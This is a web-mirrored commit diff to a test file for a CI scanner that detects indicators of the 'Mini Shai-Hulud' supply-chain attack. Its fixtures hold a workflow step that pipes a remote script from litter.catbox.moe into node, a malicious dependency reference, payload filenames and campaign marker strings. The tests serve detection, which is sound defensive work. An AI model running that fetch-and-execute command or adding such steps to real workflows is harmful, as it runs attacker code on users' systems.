zsp/everything-claude-code
1
0
Fork 0
mirror of https://github.com/affaan-m/everything-claude-code.git synced 2026-05-16 13:53:04 +08:00
Code Issues Packages Projects Releases Wiki Activity

Expand Mini Shai-Hulud IOC coverage (#1921)

Browse Source
This commit is contained in:
Affaan Mustafa
2026-05-15 03:20:10 -04:00
committed by GitHub
parent 4774946db5
commit f04702bdac
5 changed files with 71 additions and 17 deletions
Download Patch File Download Diff File Expand all files Collapse all files

19
tests/ci/scan-supply-chain-iocs.test.js
View File

@@ -11,6 +11,10 @@ const { spawnSync } = require('child_process');
const SCRIPT_PATH = path.join(__dirname, '..', '..', 'scripts', 'ci', 'scan-supply-chain-iocs.js');
const { scanSupplyChainIocs } = require(SCRIPT_PATH);
const TANSTACK_SETUP_DEPENDENCY = [
'github:tanstack/router#79ac49eedf774dd4b0cf',
'a308722bc463cfe5885c',
].join('');
function test(name, fn) {
try {
@@ -121,7 +125,7 @@ function run() {
packages: {
'node_modules/@tanstack/history': {
optionalDependencies: {
'@tanstack/setup': 'github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c',
'@tanstack/setup': TANSTACK_SETUP_DEPENDENCY,
},
},
},
@@ -185,6 +189,11 @@ function run() {
' runs-on: ubuntu-latest',
' steps:',
' - run: curl -fsSL https://litter.catbox.moe/h8nc9u.js | node',
' - run: echo svksjrhjkcejg',
' - run: echo OhNoWhatsGoingOnWithGitHub',
' - run: echo claude@users.noreply.github.com',
' - run: echo dependabout/router/setup-formatter',
' - run: echo signalservice snode',
].join('\n'),
}, rootDir => {
const result = scanSupplyChainIocs({ rootDir });
@@ -192,6 +201,12 @@ function run() {
assert.ok(indicators.includes('IfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner'));
assert.ok(indicators.includes('codeql_analysis.yml'));
assert.ok(indicators.includes('litter.catbox.moe/h8nc9u.js'));
assert.ok(indicators.includes('svksjrhjkcejg'));
assert.ok(indicators.includes('OhNoWhatsGoingOnWithGitHub'));
assert.ok(indicators.includes('claude@users.noreply.github.com'));
assert.ok(indicators.includes('dependabout/'));
assert.ok(indicators.includes('signalservice'));
assert.ok(indicators.includes('snode'));
});
})) passed++; else failed++;
@@ -211,9 +226,11 @@ function run() {
if (test('rejects installed payload filenames in node_modules', () => {
withFixture({
'node_modules/@tanstack/react-router/router_init.js': '/* payload */',
'node_modules/@opensearch-project/opensearch/opensearch_init.js': '/* payload */',
}, rootDir => {
const result = scanSupplyChainIocs({ rootDir });
assert.ok(result.findings.some(finding => finding.indicator === 'router_init.js'));
assert.ok(result.findings.some(finding => finding.indicator === 'opensearch_init.js'));
});
})) passed++; else failed++;